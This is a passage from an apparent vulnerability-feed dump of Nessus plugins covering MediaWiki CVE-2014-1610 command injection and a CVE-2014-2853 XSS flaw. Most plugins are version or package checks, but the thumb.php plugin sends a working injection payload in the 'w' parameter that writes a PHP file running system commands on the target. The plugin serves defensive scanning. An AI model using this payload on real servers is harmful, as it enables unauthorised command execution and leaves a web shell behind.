os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"mediawiki-1.21.5-1.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mediawiki\");\n}\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-04-16T14:01:49", "description": "The version of MediaWiki running on the remote host is affected by a remote command injection vulnerability due to a failure to properly sanitize user-supplied input to the 'w' parameter in the 'thumb.php' script. A remote, unauthenticated attacker can exploit this issue to execute arbitrary commands and/or execute arbitrary code on the remote host.\n\nNote that the application is also affected by an additional command injection issue. However, Nessus has not tested for this additional issue.\n\nNote also that PDF file upload support and the PdfHandler extension must be enabled in order to exploit this issue.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2014-02-21T00:00:00", "type": "nessus", "title": "MediaWiki thumb.php 'w' Parameter Remote Shell Command Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:mediawiki:mediawiki"], "id": "MEDIAWIKI_THUMB_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/72618", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72618);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-1610\");\n script_bugtraq_id(65223);\n script_xref(name:\"EDB-ID\", value:\"31329\");\n\n script_name(english:\"MediaWiki thumb.php 'w' Parameter Remote Shell Command Injection\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains an application that is affected by a\nremote command injection vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of MediaWiki running on the remote host is affected by a\nremote command injection vulnerability due to a failure to properly\nsanitize user-supplied input to the 'w' parameter in the 'thumb.php'\nscript. A remote, unauthenticated attacker can exploit this issue to\nexecute arbitrary commands and/or execute arbitrary code on the remote\nhost.\n\nNote that the application is also affected by an additional command\ninjection issue. However, Nessus has not tested for this additional\nissue.\n\nNote also that PDF file upload support and the PdfHandler extension\nmust be enabled in order to exploit this issue.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2014/Feb/6\");\n # https://www.checkpoint.com/threatcloud-central/articles/2014-01-28-tc-researchers-discover.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f8ca1fc8\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.19\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.21\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.22\");\n # https://lists.wikimedia.org/pipermail/mediawiki-announce/2014-January/000140.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?92483abd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MediaWiki 1.19.11 / 1.21.5 / 1.22.2 or later, and update\nthe PdfHandler extension to the latest available version.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-1610\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"MediaWiki thumb.php page Parameter Remote Shell Command Injection\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MediaWiki Thumb.php Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mediawiki:mediawiki\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mediawiki_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"installed_sw/MediaWiki\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\ninclude(\"url_func.inc\");\n\napp = \"MediaWiki\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port\n);\ndir = install['path'];\ninstall_url = build_url(port:port, qs:dir);\n\n# Variables\nfile = NULL;\nurl = \"/images\";\n\nfunction pdf_chk(string)\n{\n local_var item, file;\n item = eregmatch(pattern:'\\\\<a href=\"(.*\\\\.pdf)\"', string:string);\n\n if (isnull(item)) return NULL;\n\n file = item[1];\n return file;\n}\n\nfunction d_listing(string)\n{\n local_var matches, match, item, subdir, subdirs, pat;\n subdirs = make_list();\n pat = 'alt=\"\\\\[DIR\\\\]\"\\\\>.*\\\\<a href=\"([^/].*/)\"\\\\>';\n\n if (egrep(pattern:\"\\<title\\>Index of (.*)\", string:string))\n {\n matches = egrep(pattern:pat, string:string);\n if (matches)\n {\n foreach match (split(matches))\n {\n item = eregmatch(pattern:pat, string:match);\n if (!isnull(item))\n {\n subdir = item[1];\n if (subdir == \"temp/\") continue; #Ignore temp directory\n subdirs = make_list(subdirs, subdir);\n }\n }\n }\n }\n return subdirs;\n}\n\n# Check /images for a directory listing and find an existing PDF\nres = http_send_recv3(\n method : \"GET\",\n port : port,\n item : dir + url,\n exit_on_fail : TRUE,\n follow_redirect : 1\n);\n\nif (egrep(pattern:\"\\<title\\>Index of (.*)/images\\</title\\>\", string:res[2]))\n{\n file = pdf_chk(string:res[2]);\n\n # Get a list of directories and traverse each to look for a PDF\n # Only go 3 levels deep\n if (isnull(file))\n {\n subdirs = d_listing(string:res[2]);\n foreach d1 (subdirs)\n {\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : dir + url + \"/\" + d1,\n exit_on_fail : TRUE\n );\n if (!isnull(res[2]))\n file = pdf_chk(string:res[2]);\n if (!isnull(file)) break;\n\n subdirs2 = d_listing(string:res[2]);\n foreach d2 (subdirs2)\n {\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : dir + url + \"/\" + d1 + d2,\n exit_on_fail : TRUE\n );\n if (!isnull(res[2]))\n file = pdf_chk(string:res[2]);\n if (!isnull(file)) break;\n\n subdirs3 = d_listing(string:res[2]);\n foreach d3 (subdirs3)\n {\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : dir + url + \"/\" + d1 + d2 + d3,\n exit_on_fail : TRUE\n );\n if (!isnull(res[2]))\n file = pdf_chk(string:res[2]);\n if (!isnull(file)) break;\n }\n if (!isnull(file)) break;\n }\n if (!isnull(file)) break;\n }\n }\n}\n\nif (isnull(file))\n exit(0, \"No PDF files were found in \" + install_url + url);\n\n# Determine which command to execute on target host\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) cmd = 'ipconfig /all';\n else cmd = 'id';\n\n cmds = make_list(cmd);\n}\nelse cmds = make_list('id', 'ipconfig /all');\n\ncmd_pats = make_array();\ncmd_pats['id'] = \"uid=[0-9]+.*gid=[0-9]+.*\";\ncmd_pats['ipconfig /all'] = \"Subnet Mask\";\n\nexp_file = SCRIPT_NAME - \".nasl\" + \"-\" + unixtime();\nr = 0;\n\nforeach cmd (cmds)\n{\n exp_file += r;\n if (cmd == \"id\")\n attack = '/thumb.php?f=' +file+ '&w=5|`echo \"<?php system(id);' +\n 'echo(\\\\\"path=\\\\\"); system(pwd);\">images/' +exp_file+ '.php`';\n else\n {\n attack = '/thumb.php?f=' +file+ '&w=5|echo \"<?php echo(' + \"'<pre>');\" +\n \"system('ipconfig /all');system('dir \" +exp_file+ \".php');\" +\n '//\">images/' +exp_file+ \".php\";\n }\n\n attack = urlencode(\n str : attack,\n unreserved : \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234\" +\n \"56789=+&|.?`;/()-_\"\n );\n\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : dir + attack,\n exit_on_fail : TRUE\n );\n\n if (\"<h1>Error generating thumbnail</h1>\" >< res[2])\n {\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : dir + url + \"/\" + exp_file + \".php\",\n exit_on_fail : TRUE\n );\n if (egrep(pattern:cmd_pats[cmd], string:res[2]))\n {\n if (cmd == \"id\")\n {\n pwd = strstr(res[2], \"path\");\n output = res[2] - pwd;\n path = chomp(pwd - \"path=\");\n break;\n }\n else\n {\n output = strstr(res[2], \"Windows IP\");\n item = eregmatch(pattern:\"Directory of (.*)\", string:res[2]);\n\n if (!isnull(item))\n {\n path = chomp(item[1]);\n pos = stridx(output, \"Volume in drive\");\n output = substr(output, 0, pos - 1);\n break;\n }\n }\n break;\n }\n }\n r++;\n}\n\nif (strlen(output) > 0)\n{\n security_report_v4(\n port : port,\n severity : SECURITY_WARNING,\n cmd : cmd,\n request : make_list(install_url + attack, install_url + url + \"/\" + exp_file + \".php\"),\n output : chomp(output),\n rep_extra : \n '\\nNote: This file has not been removed by Nessus and will need to'+\n '\\nbe manually deleted (' +path+ ').'\n ); \n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-04-16T14:01:04", "description": "According to its version number, the instance of MediaWiki running on the remote host is affected by the following remote code execution vulnerabilities :\n\n - A user-input validation error exists during thumbnail generation in the 'thumb.php' script that allows the execution of arbitrary shell commands via a specially crafted DjVu file.\n\n - A user-input validation error exists in the 'pdfhandler_body.php' script used by the PdfHandler extension that allows the execution of arbitrary shell commands via a specially crafted PDF file.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number. Also note that the affected features are not enabled by default.", "cvss3": {"score": null, "vector": null}, "published": "2014-01-30T00:00:00", "type": "nessus", "title": "MediaWiki < 1.19.11 / 1.21.5 / 1.22.2 Multiple Remote Code Execution Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:mediawiki:mediawiki"], "id": "MEDIAWIKI_1_19_11.NASL", "href": "https://www.tenable.com/plugins/nessus/72215", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72215);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-1610\");\n script_bugtraq_id(65223);\n\n script_name(english:\"MediaWiki < 1.19.11 / 1.21.5 / 1.22.2 Multiple Remote Code Execution Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains an application that is affected by\nmultiple remote code execution vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the instance of MediaWiki running\non the remote host is affected by the following remote code execution\nvulnerabilities :\n\n - A user-input validation error exists during thumbnail\n generation in the 'thumb.php' script that allows the\n execution of arbitrary shell commands via a specially\n crafted DjVu file.\n\n - A user-input validation error exists in the\n 'pdfhandler_body.php' script used by the PdfHandler\n extension that allows the execution of arbitrary shell\n commands via a specially crafted PDF file.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number. Also\nnote that the affected features are not enabled by default.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2014/Feb/6\");\n # https://www.checkpoint.com/threatcloud-central/articles/2014-01-28-tc-researchers-discover.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f8ca1fc8\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.19\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.21\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.22\");\n # https://lists.wikimedia.org/pipermail/mediawiki-announce/2014-January/000140.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?92483abd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MediaWiki version 1.19.11 / 1.21.5 / 1.22.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-1610\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"MediaWiki thumb.php page Parameter Remote Shell Command Injection\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MediaWiki Thumb.php Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/01/30\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mediawiki:mediawiki\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mediawiki_detect.nasl\");\n script_require_keys(\"Settings/ParanoidReport\", \"installed_sw/MediaWiki\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"MediaWiki\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\nversion = install['version'];\ninstall_url = build_url(qs:install['path'], port:port);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# Check Point says the DjVu issue affects 1.8 onwards.\nif (\n version =~ \"^1\\.[89]\\.\" ||\n version =~ \"^1\\.1[0-8]\\.\" ||\n version =~ \"^1\\.19\\.([0-9]|10)([^0-9]|$)\" ||\n version =~ \"^1\\.21\\.[0-4]([^0-9]|$)\" ||\n version =~ \"^1\\.22\\.[01]([^0-9]|$)\"\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed versions : 1.19.11 / 1.21.5 / 1.22.2' +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:51:17", "description": "- Update to 1.21.5\n\n - (bug 60339) (CVE-2014-1610) SECURITY: Reported RCE in djvu thumbnailing\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-02-07T00:00:00", "type": "nessus", "title": "Fedora 19 : mediawiki-1.21.5-1.fc19 (2014-1802)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1610"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:mediawiki", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2014-1802.NASL", "href": "https://www.tenable.com/plugins/nessus/72379", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-1802.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72379);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-1610\");\n script_bugtraq_id(65223);\n script_xref(name:\"FEDORA\", value:\"2014-1802\");\n\n script_name(english:\"Fedora 19 : mediawiki-1.21.5-1.fc19 (2014-1802)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Update to 1.21.5\n\n - (bug 60339) (CVE-2014-1610) SECURITY: Reported RCE in\n djvu thumbnailing\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1058981\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-February/127942.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b4c47368\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mediawiki package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"MediaWiki thumb.php page Parameter Remote Shell Command Injection\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MediaWiki Thumb.php Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/01/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"mediawiki-1.21.5-1.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mediawiki\");\n}\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-04-16T14:03:23", "description": "According to its version number, the instance of MediaWiki running on the remote host is affected by a cross-site scripting vulnerability. A flaw exists with 'sortKey' in the 'InfoAction.php' script. This allows a remote attacker to execute arbitrary code within the server and browser trust relationship.\n\nNessus has not tested for this issue but has instead relied on the application's self-reported version number.", "cvss3": {"score": null, "vector": null}, "published": "2014-05-01T00:00:00", "type": "nessus", "title": "MediaWiki < 1.21.9 / 1.22.6 'InfoAction.php' XSS", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-2853"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:mediawiki:mediawiki"], "id": "MEDIAWIKI_1_21_9.NASL", "href": "https://www.tenable.com/plugins/nessus/73804", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73804);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-2853\");\n script_bugtraq_id(67068);\n\n script_name(english:\"MediaWiki < 1.21.9 / 1.22.6 'InfoAction.php' XSS\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains an application that is affected by a\ncross-site scripting vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the instance of MediaWiki running on\nthe remote host is affected by a cross-site scripting vulnerability. A\nflaw exists with 'sortKey' in the 'InfoAction.php' script. This allows\na remote attacker to execute arbitrary code within the server and\nbrowser trust relationship.\n\nNessus has not tested for this issue but has instead relied on the\napplication's self-reported version number.\");\n # https://lists.wikimedia.org/pipermail/mediawiki-announce/2014-April/000149.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?86d2377c\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.21\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.22\");\n script_set_attribute(attribute:\"see_also\", value:\"https://phabricator.wikimedia.org/T65251\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MediaWiki version 1.21.9 / 1.22.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/01\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mediawiki:mediawiki\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"mediawiki_detect.nasl\");\n script_require_keys(\"Settings/ParanoidReport\", \"installed_sw/MediaWiki\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"MediaWiki\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\nversion = install['version'];\ninstall_url = build_url(qs:install['path'], port:port);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# Detecting for all previous versions.\nif (\n version =~ \"^1\\.21\\.[0-8]([^0-9]|$)\" ||\n version =~ \"^1\\.22\\.[0-5]([^0-9]|$)\"\n)\n{\n set_kb_item(name:\"www/\"+port+\"/XSS\", value:TRUE);\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed versions : 1.21.9 / 1.22.6' +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-04-16T14:03:51", "description": "- (bug 63251) (CVE-2014-2853) SECURITY: Escape sortKey in pageInfo.\n\n - (bug 58640) Fixed a compatibility issue with PCRE 8.34 that caused pages to appear blank or with missing text.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-05-06T00:00:00", "type": "nessus", "title": "Fedora 20 : mediawiki-1.21.9-1.fc20 (2014-5684)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-2853"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:mediawiki", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-5684.NASL", "href": "https://www.tenable.com/plugins/nessus/73874", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-5684.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73874);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_bugtraq_id(67068);\n script_xref(name:\"FEDORA\", value:\"2014-5684\");\n\n script_name(english:\"Fedora 20 : mediawiki-1.21.9-1.fc20 (2014-5684)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - (bug 63251) (CVE-2014-2853) SECURITY: Escape sortKey in\n pageInfo.\n\n - (bug 58640) Fixed a compatibility issue with PCRE 8.34\n that caused pages 